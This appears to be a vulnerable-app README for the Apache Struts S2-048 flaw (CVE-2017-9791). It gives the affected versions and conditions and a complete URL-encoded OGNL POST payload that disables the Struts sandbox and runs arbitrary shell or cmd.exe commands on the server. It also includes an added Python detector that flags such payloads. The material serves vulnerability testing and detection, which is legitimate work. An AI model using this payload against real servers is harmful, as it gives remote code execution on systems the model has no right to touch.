S2-048 (CVE-2017-9791)

Affected Version

Struts 2.3.x

In addition, the following conditions must be met:

  1. The application uses the non-default plugin struts2-struts1-plugin.jar

  2. The code builds an ActionMessage by concatenating user input into the message string, as in:

    messages.add("msg", new ActionMessage("Gangster " + gform.getName() + " was added"));

PoC

The vulnerable environment is the showcase application shipped with Struts 2.3.32.

Verification with the Python script (poc.py)

Verification with Firefox HackBar:

POST request body:

```
age=1&cmd=echo Affected by S2-048&__checkbox_bustedBefore=true&name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%23parameters.cmd%5B0%5D%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&description=test
```

Result:
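Defender-side example added here (not the repository's poc.py): a small log-review / WAF-style check that URL-decodes each form field of a POST body like the one above and flags values carrying the OGNL expression wrapper or the sandbox-escape identifiers seen in the S2-048 payload. The marker list and the constructed sample bodies are assumptions for illustration.

```python
"""Flag S2-048-style OGNL injection attempts in form-encoded POST bodies.

Hypothetical detection helper (added example, not the repository's poc.py).
Each field is URL-decoded once, as the servlet container would do, and then
checked for the markers that the public S2-048 payload needs to run.
"""
from urllib.parse import parse_qsl

# Markers taken from the decoded form of this repository's POST example.
OGNL_MARKERS = (
    "%{",                      # OGNL expression wrapper
    "_memberAccess",           # sandbox context object being overwritten
    "DEFAULT_MEMBER_ACCESS",   # ognl.OgnlContext constant used to lift the sandbox
    "getExcludedPackageNames", # OgnlUtil exclusion lists being cleared
    "ProcessBuilder",          # command execution sink
)


def decode_form(body: str) -> dict:
    """Parse an application/x-www-form-urlencoded body into {field: decoded value}."""
    return dict(parse_qsl(body, keep_blank_values=True))


def find_ognl_fields(body: str) -> dict:
    """Return {field: [matched markers]} for every field whose decoded value looks like OGNL."""
    hits = {}
    for field, value in decode_form(body).items():
        found = [marker for marker in OGNL_MARKERS if marker in value]
        if found:
            hits[field] = found
    return hits


def is_s2_048_attempt(body: str) -> bool:
    """True when at least one form field carries OGNL injection markers."""
    return bool(find_ognl_fields(body))


# Constructed samples: a normal submission and a shortened copy of the POST body
# shown above (only the prefix that rewrites #_memberAccess is kept).
BENIGN_POST = "age=1&name=Alice&description=test"
SUSPICIOUS_POST = (
    "age=1&cmd=id&name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29"
    ".%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%29%29%7D&description=test"
)

if __name__ == "__main__":
    print(find_ognl_fields(BENIGN_POST))      # {}
    print(find_ognl_fields(SUSPICIOUS_POST))  # {'name': ['%{', '_memberAccess', 'DEFAULT_MEMBER_ACCESS']}
```

Only the `name` field is flagged here because that is the field the vulnerable ActionMessage concatenation renders; in practice apply the check to every field the Struts1 plugin maps onto an ActionForm.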

References

  1. https://cwiki.apache.org/confluence/display/WW/S2-048
  2. https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-048